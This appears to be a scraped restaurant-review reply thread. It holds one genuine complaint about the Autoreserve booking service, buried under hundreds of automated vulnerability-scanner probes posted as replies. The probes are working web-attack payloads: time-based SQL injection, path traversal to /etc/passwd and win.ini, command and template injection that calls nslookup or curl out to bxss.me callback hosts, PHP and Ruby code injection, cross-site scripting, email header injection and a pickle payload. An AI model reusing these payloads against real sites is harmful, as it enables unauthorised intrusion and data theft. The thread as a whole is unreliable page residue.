-1 OR 5*5=26

1753894670

re: guest


*if(now()=sysdate(),sleep(15),0)

1753894676

re: guest


0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z

1753894684

re: guest


0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z

1753894691

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1753894696

re: guest


-1; waitfor delay '0:0:15' --

1753894702

re: guest


-1); waitfor delay '0:0:15' --

1753894712

re: guest


-1 waitfor delay '0:0:15' --

1753894719

re: guest


JPUPITXL'; waitfor delay '0:0:15' --

1753894725

re: guest


-1 OR 942=(SELECT 942 FROM PG_SLEEP(15))--

1753894730

re: guest


-1) OR 770=(SELECT 770 FROM PG_SLEEP(15))--

1753894736

re: guest


-1)) OR 328=(SELECT 328 FROM PG_SLEEP(15))--

1753894743

re: guest


dZCtUn8U' OR 550=(SELECT 550 FROM PG_SLEEP(15))--

1753894749

re: guest


PzTUSeuZ') OR 753=(SELECT 753 FROM PG_SLEEP(15))--

1753894756

re: guest


YP22fnaa')) OR 707=(SELECT 707 FROM PG_SLEEP(15))--

1753894761

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1753894768

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1753894774

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1753894780

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1753894790

re: guest


'"

1753894791

re: guest

@@QIkFM

1753894793

re: guest

(select 198766*667891)

1753894794

re: guest

(select 198766*667891 from DUAL)

1753894795

Tried using it to book Sharikimon Chawanbu, and received an unsuccessful response after 3 days (they tried for 2 days but couldn’t get through).

Succeeded in reserving twice on previous occasions by simply calling, and didn’t find it to be a terribly hard reservation to make. So I wasn’t impressed with Autoreserve, haha.

1680605735 Reply
Add photos

re: JJ

BfMfVSXp

1697002534

re: JJ

1*

1697002534

re: JJ

1*

1697002535

re: JJ

1*

1697002535

re: JJ

1*

1697002535

re: JJ

-1 OR 2+22-22-1=0+0+0+1

1697002535

re: JJ

-1 OR 3+22-22-1=0+0+0+1

1697002535

re: JJ

if(now()=sysdate(),sleep(15),0)

1697002540

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002545

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002550

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002555

re: JJ

-1; waitfor delay '0:0:15' --

1697002560

re: JJ

-1); waitfor delay '0:0:15' --

1697002565

re: JJ

1 waitfor delay '0:0:15' --

1697002569

re: JJ

WXFC0K64'; waitfor delay '0:0:15' --

1697002573

re: JJ

-5 OR 518=(SELECT 518 FROM PG_SLEEP(15))--

1697002577

re: JJ

ZoWaSAA9

1697002580

re: JJ

1*

1697002580

re: JJ

1*

1697002581

re: JJ

1*

1697002581

re: JJ

1*

1697002581

re: JJ

-1 OR 2+81-81-1=0+0+0+1

1697002581

re: JJ

-1 OR 3+81-81-1=0+0+0+1

1697002581

re: JJ

-5) OR 470=(SELECT 470 FROM PG_SLEEP(15))--

1697002582

re: JJ

if(now()=sysdate(),sleep(15),0)

1697002585

re: JJ

-1)) OR 571=(SELECT 571 FROM PG_SLEEP(15))--

1697002587

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002589

re: JJ

DiLxp81h' OR 757=(SELECT 757 FROM PG_SLEEP(15))--

1697002590

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002595

re: JJ

9ZbxIKIQ') OR 782=(SELECT 782 FROM PG_SLEEP(15))--

1697002596

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002599

re: JJ

87aUNrUe')) OR 650=(SELECT 650 FROM PG_SLEEP(15))--

1697002600

re: JJ

-1; waitfor delay '0:0:15' --

1697002603

re: JJ


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002604

re: JJ

-1); waitfor delay '0:0:15' --

1697002607

re: JJ


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002609

re: JJ

1 waitfor delay '0:0:15' --

1697002613

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1697002615

re: JJ

FoQLWcBl'; waitfor delay '0:0:15' --

1697002618

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1697002619

re: JJ

1'"

1697002619

re: JJ

@@JSmRR

1697002620

re: JJ

-5 OR 120=(SELECT 120 FROM PG_SLEEP(15))--

1697002622

re: JJ

-5) OR 727=(SELECT 727 FROM PG_SLEEP(15))--

1697002626

re: JJ

-1)) OR 114=(SELECT 114 FROM PG_SLEEP(15))--

1697002630

re: JJ

y4J2myeG' OR 934=(SELECT 934 FROM PG_SLEEP(15))--

1697002636

re: JJ

4r24BZOY') OR 197=(SELECT 197 FROM PG_SLEEP(15))--

1697002640

re: JJ

uZJO7hnE')) OR 195=(SELECT 195 FROM PG_SLEEP(15))--

1697002644

re: JJ


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002648

re: JJ


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002654

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1697002661

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1697002665

re: JJ

1'"

1697002665

re: JJ

@@oySq6

1697002666

re: JJ

1oI5CvbnO

1727141188

re: JJ

response.write(9645929*9158520)

1727141193

re: JJ

'+response.write(9645929*9158520)+'

1727141194

re: JJ

<esi:include src="http://bxss.me/rpb.png"/>

1727141194

re: JJ

%0abcc:074625.67-13768.67.6f84a.19990.2@bxss.me

1727141194

re: JJ

"+response.write(9645929*9158520)+"

1727141194

re: JJ

to@example.com>%0d%0abcc:074625.67-13769.67.6f84a.19990.2@bxss.me

1727141195

re: JJ

${9999612+9999044}

1727141196

re: JJ

../../../../../../../../../../../../../../etc/passwd

1727141198

re: JJ

../../../../../../../../../../../../../../windows/win.ini

1727141199

re: JJ

file:///etc/passwd

1727141200

re: JJ

)

1727141201

re: JJ

../../../../../../../../../../../../../../../proc/version

1727141201

re: JJ

'.gethostbyname(lc('hitdw'.'vihexltiee1cb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(74).chr(118).chr(68).'

1727141201

re: JJ

!(()&&!|*|*|

1727141202

re: JJ

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727141202

re: JJ

".gethostbyname(lc("hitix"."npoatckpefa99.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(68).chr(118).chr(70)."

1727141202

re: JJ

^(#$!@#$)(()))******

1727141203

re: JJ

../../../../../../../../../../etc/passwd%00.jpg

1727141203

re: JJ

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727141204

re: JJ

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727141204

re: JJ

echo obgxph$()\ zmfnhx\nz^xyu||a #' &echo obgxph$()\ zmfnhx\nz^xyu||a #|" &echo obgxph$()\ zmfnhx\nz^xyu||a #

1727141205

re: JJ

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727141205

re: JJ

&echo bgrsbq$()\ reapni\nz^xyu||a #' &echo bgrsbq$()\ reapni\nz^xyu||a #|" &echo bgrsbq$()\ reapni\nz^xyu||a #

1727141206

re: JJ

/etc/passwd

1727141206

re: JJ

|echo txtazf$()\ uitpun\nz^xyu||a #' |echo txtazf$()\ uitpun\nz^xyu||a #|" |echo txtazf$()\ uitpun\nz^xyu||a #

1727141208

re: JJ

%2fetc%2fpasswd

1727141208

1727141208

re: JJ

"+"A".concat(70-3).concat(22*4).concat(116).concat(86).concat(116).concat(78)+(require"socket"
Socket.gethostbyname("hitdy"+"sxjrgpipb4122.bxss.me.")[3].to_s)+"

1727141209

re: JJ

(nslookup hitruzjwfjost835e8.bxss.me||perl -e "gethostbyname('hitruzjwfjost835e8.bxss.me')")

1727141209

re: JJ

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141209

re: JJ

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141210

re: JJ

bxss.me/t/xss.html?%00

1727141210

re: JJ

'+'A'.concat(70-3).concat(22*4).concat(102).concat(90).concat(113).concat(82)+(require'socket'
Socket.gethostbyname('hitas'+'unvvfovz1f2cb.bxss.me.')[3].to_s)+'

1727141210

re: JJ

$(nslookup hitsvquboiphlc2516.bxss.me||perl -e "gethostbyname('hitsvquboiphlc2516.bxss.me')")

1727141210

re: JJ

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141210

1727141210

re: JJ

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141211

re: JJ

&nslookup hityhsdwqbvgw768db.bxss.me&'\"`0&nslookup hityhsdwqbvgw768db.bxss.me&`'

1727141211

re: JJ

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141212

1727141212

re: JJ

&(nslookup hitbouttzgdjkae401.bxss.me||perl -e "gethostbyname('hitbouttzgdjkae401.bxss.me')")&'\"`0&(nslookup hitbouttzgdjkae401.bxss.me||perl -e "gethostbyname('hitbouttzgdjkae401.bxss.me')")&`'

1727141212

re: JJ

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141212

re: JJ

/etc/shells

1727141213

re: JJ

|(nslookup hitlugugqolaqfae79.bxss.me||perl -e "gethostbyname('hitlugugqolaqfae79.bxss.me')")

1727141213

re: JJ

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141213

re: JJ

c:/windows/win.ini

1727141213

re: JJ

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141214

re: JJ

`(nslookup hituanfeoslzub509f.bxss.me||perl -e "gethostbyname('hituanfeoslzub509f.bxss.me')")`

1727141214

re: JJ

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141214

re: JJ

bxss.me

1727141214

re: JJ

'"

1727141214

re: JJ

';print(md5(31337));$a='

1727141214

re: JJ

;(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")|(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")&(nslookup hitgmnrdhrbkmda4fd.bxss.me||perl -e "gethostbyname('hitgmnrdhrbkmda4fd.bxss.me')")

1727141215

re: JJ

file:///etc/passwd

1727141215

re: JJ

<!--

1727141215

re: JJ

";print(md5(31337));$a="

1727141215

re: JJ

/\../\../\../\../\../\../\../etc/passwd

1727141216

re: JJ

${@print(md5(31337))}

1727141216

re: JJ

/WEB-INF/web.xml

1727141216

re: JJ

${@print(md5(31337))}\

1727141217

re: JJ

C:\WINDOWS\system32\drivers\etc\hosts

1727141217

re: JJ

'.print(md5(31337)).'

1727141218

re: JJ

../../../../../../../../../../windows/win.ini%00.jpg

1727141218

re: JJ

/../../../../../../../../../../boot.ini

1727141218

re: JJ

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141219

re: JJ

..\..\..\..\..\..\..\..\windows\win.ini

1727141220

re: JJ

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141221

re: JJ

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141222

re: JJ

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141222

re: JJ

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141223

re: JJ

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141224

re: JJ

WEB-INF/web.xml

1727141225

re: JJ

WEB-INF\web.xml

1727141225

re: JJ

1

1727141658

re: JJ

1

1727141691

re: JJ

-1 OR 2+191-191-1=0+0+0+1 --

1727141692

re: JJ

-1 OR 3+191-191-1=0+0+0+1 --

1727141692

re: JJ

-1 OR 2+203-203-1=0+0+0+1

1727141692

re: JJ

-1 OR 3+203-203-1=0+0+0+1

1727141693

re: JJ

-1' OR 2+283-283-1=0+0+0+1 --

1727141693

re: JJ

-1' OR 3+283-283-1=0+0+0+1 --

1727141694

re: JJ

-1' OR 2+528-528-1=0+0+0+1 or 'bPQgTocz'='

1727141694

re: JJ

-1' OR 3+528-528-1=0+0+0+1 or 'bPQgTocz'='

1727141695

re: JJ

-1" OR 2+956-956-1=0+0+0+1 --

1727141695

re: JJ

-1" OR 3+956-956-1=0+0+0+1 --

1727141696

re: JJ

if(now()=sysdate(),sleep(15),0)

1727141711

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141723

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141733

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141745

re: JJ

-1; waitfor delay '0:0:15' --

1727141756

re: JJ

-1); waitfor delay '0:0:15' --

1727141767

re: JJ

1 waitfor delay '0:0:15' --

1727141776

re: JJ

1YVlLFWK'; waitfor delay '0:0:15' --

1727141785

re: JJ

-5 OR 86=(SELECT 86 FROM PG_SLEEP(15))--

1727141793

re: JJ

-5) OR 848=(SELECT 848 FROM PG_SLEEP(15))--

1727141801

re: JJ

-1)) OR 494=(SELECT 494 FROM PG_SLEEP(15))--

1727141809

re: JJ

g2ZEU4DX' OR 433=(SELECT 433 FROM PG_SLEEP(15))--

1727141819

re: JJ

MIJuQAiO') OR 451=(SELECT 451 FROM PG_SLEEP(15))--

1727141835

re: JJ

j6qdBOWB')) OR 313=(SELECT 313 FROM PG_SLEEP(15))--

1727141843

re: JJ

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141856

re: JJ

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141868

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1727141883

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1727141897

re: JJ

1'"

1727141898

re: JJ

@@jEKdE

1727141900

re: JJ

1

1727383017

re: JJ

1

1727383026

re: JJ

1

1727383026

re: JJ

1

1727383578

re: JJ

1

1727383578

re: JJ

1

1727383579

re: JJ

1BDXM95QV40

1753894497

re: JJ

response.write(9210049*9212519)

1753894503

re: JJ

'+response.write(9210049*9212519)+'

1753894505

re: JJ

"+response.write(9210049*9212519)+"

1753894506

re: JJ


<esi:include src="http://bxss.me/rpb.png"/>

1753894506

re: JJ

${9999224+9999734}

1753894511

re: JJ

../../../../../../../../../../../../../../etc/passwd

1753894513

re: JJ

../../../../../../../../../../../../../../windows/win.ini

1753894514

re: JJ

redirtest.acx

1753894515

re: JJ

file:///etc/passwd

1753894515

re: JJ

ctime
sleep
p0
(I30
tp1
Rp2
.

1753894518

re: JJ

../

1753894518

re: JJ

)

1753894520

re: JJ

!(()&&!|*|*|

1753894521

re: JJ

'.gethostbyname(lc('hitjl'.'ekaitrwm39217.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(85).chr(122).chr(71).'

1753894522

re: JJ

^(#$!@#$)(()))******

1753894523

re: JJ

".gethostbyname(lc("hitxb"."qsskmxxq75a22.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(88).chr(113).chr(81)."

1753894524

re: JJ

gethostbyname(lc('hitew'.'rszbqerybbc20.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(79).chr(102).chr(74)

1753894525

1753894532

re: JJ

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

1753894533

re: JJ

bxss.me/t/xss.html?%00

1753894533

re: JJ

'"

1753894534

re: JJ

/etc/shells

1753894535

re: JJ

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1753894535

re: JJ

<!--

1753894535

re: JJ

"+"A".concat(70-3).concat(22*4).concat(114).concat(71).concat(98).concat(83)+(require"socket"
Socket.gethostbyname("hitkm"+"wrwkvhvf4f115.bxss.me.")[3].to_s)+"

1753894535

re: JJ

../../../../../../../../../../../../../../etc/shells

1753894536

re: JJ

';print(md5(31337));$a='

1753894536

re: JJ

replies

1753894536

re: JJ

'+'A'.concat(70-3).concat(22*4).concat(113).concat(71).concat(112).concat(65)+(require'socket'
Socket.gethostbyname('hittf'+'cwsocnpoa733a.bxss.me.')[3].to_s)+'

1753894537

re: JJ

c:/windows/win.ini

1753894537

re: JJ

replies

1753894538

re: JJ

";print(md5(31337));$a="

1753894538

re: JJ

'A'.concat(70-3).concat(22*4).concat(99).concat(89).concat(122).concat(82)+(require'socket'
Socket.gethostbyname('hithi'+'kdpjfyoqd5b2d.bxss.me.')[3].to_s)

1753894538

re: JJ

bxss.me

1753894539

re: JJ

replies/.

1753894539

re: JJ

${@print(md5(31337))}

1753894539

1753894540

re: JJ


'"()&%<zzz><ScRiPt >4VMr(9998)</ScRiPt>

1753894540

re: JJ

${@print(md5(31337))}\

1753894541

re: JJ

echo asvtrf$()\ sfexca\nz^xyu||a #' &echo asvtrf$()\ sfexca\nz^xyu||a #|" &echo asvtrf$()\ sfexca\nz^xyu||a #

1753894541

1753894542

re: JJ

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitgjquhfyszpadc99.bxss.me")}}

1753894542

re: JJ

'.print(md5(31337)).'

1753894542

re: JJ

&echo fmjenj$()\ mczyqe\nz^xyu||a #' &echo fmjenj$()\ mczyqe\nz^xyu||a #|" &echo fmjenj$()\ mczyqe\nz^xyu||a #

1753894543

re: JJ

'"()&%<zzz><ScRiPt >4VMr(9012)</ScRiPt>

1753894543

re: JJ

|echo zjyrrf$()\ ksrpqv\nz^xyu||a #' |echo zjyrrf$()\ ksrpqv\nz^xyu||a #|" |echo zjyrrf$()\ ksrpqv\nz^xyu||a #

1753894544

re: JJ


9520658

1753894545

re: JJ

expr 9000840398 - 949437

1753894545

re: JJ

'"()

1753894546

re: JJ

(nslookup -q=cname hitwhaeadhxcn079f7.bxss.me||curl hitwhaeadhxcn079f7.bxss.me))

1753894547

re: JJ


'&&sleep(27*1000)*nbpcni&&'

1753894548

re: JJ

$(nslookup -q=cname hitqwccllhecp2a4f6.bxss.me||curl hitqwccllhecp2a4f6.bxss.me)

1753894548

re: JJ


"&&sleep(27*1000)*kfrift&&"

1753894549

re: JJ

&nslookup -q=cname hitgztqjhbawtc7604.bxss.me&'\"`0&nslookup -q=cname hitgztqjhbawtc7604.bxss.me&`'

1753894550

re: JJ


'||sleep(27*1000)*hfpvtz||'

1753894551

re: JJ

&(nslookup -q=cname hitmqnoaqedefc1f47.bxss.me||curl hitmqnoaqedefc1f47.bxss.me)&'\"`0&(nslookup -q=cname hitmqnoaqedefc1f47.bxss.me||curl hitmqnoaqedefc1f47.bxss.me)&`'

1753894551

re: JJ


"||sleep(27*1000)*aikzno||"

1753894552

re: JJ

